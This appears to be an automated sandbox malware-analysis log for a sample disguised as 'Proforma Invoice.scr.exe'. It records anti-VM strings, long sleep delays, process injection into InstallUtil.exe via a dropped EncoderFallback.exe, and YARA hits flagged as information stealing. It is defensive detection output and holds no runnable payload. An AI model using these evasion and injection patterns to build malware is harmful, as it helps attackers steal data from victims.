                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598421s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598312s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598203s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -598094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597984s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597516s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597406s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597297s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597187s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -597078s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596969s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596859s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596750s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596516s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596391s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596281s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596172s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -596062s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595953s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595843s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595734s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595625s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595516s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595391s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595266s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595156s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -595047s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -594937s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -594828s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -594718s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -594609s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 612Thread sleep time: -594500s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596609Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596500Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596317Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596180Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596030Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595898Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595653Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595313Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595188Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595078Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594616Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594498Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594389Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594281Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594171Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594062Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593953Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99890Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99780Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99671Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99561Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99451Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99343Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99203Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99013Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 98894Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 98765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 98424Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 98273Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 98156Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 98046Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97937Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97827Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97718Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97609Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97499Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97390Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97281Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97171Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97062Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96952Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96843Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96734Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96624Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96515Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96406Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96296Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96187Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96070Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 95937Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 95812Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 95702Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 95588Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 95470Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599655Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598421Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598312Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598203Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597984Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597406Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597297Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597187Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597078Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596281Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596172Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596062Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595953Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595843Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595625Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595266Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594937Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594828Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594718Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594609Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594500Jump to behavior
                      Source: EncoderFallback.exe, 00000006.00000002.2753904041.0000000002C37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2453582503.0000000000981000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
                      Source: EncoderFallback.exe, 00000006.00000002.2753904041.0000000002C37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: wscript.exe, 00000005.00000002.2588650747.000002E20E564000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\L5
                      Source: EncoderFallback.exe, 00000006.00000002.2750285335.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3538666880.0000000005CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: InstallUtil.exe, 00000003.00000002.2761171022.0000000004F33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 442000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 637008Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\EncoderFallback.exe "C:\Users\user\AppData\Roaming\EncoderFallback.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeQueries volume information: C:\Users\user\Desktop\Proforma Invoice.scr.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeQueries volume information: C:\Users\user\AppData\Roaming\EncoderFallback.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EncoderFallback.exe.3cf5570.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.340000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EncoderFallback.exe.3cf5570.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2755078286.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2755078286.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3529968351.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3529968351.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2755078286.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3529968351.00000000028C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.scr.exe PID: 4000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3412, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EncoderFallback.exe PID: 6828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5868, type: MEMORYSTR
